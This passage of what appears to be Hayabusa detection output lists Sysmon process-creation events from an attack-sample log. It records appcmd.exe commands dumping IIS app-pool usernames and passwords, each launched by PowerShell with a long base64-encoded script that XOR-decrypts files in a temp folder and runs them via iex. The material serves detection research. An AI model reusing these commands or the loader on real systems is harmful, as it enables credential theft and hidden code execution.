gACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 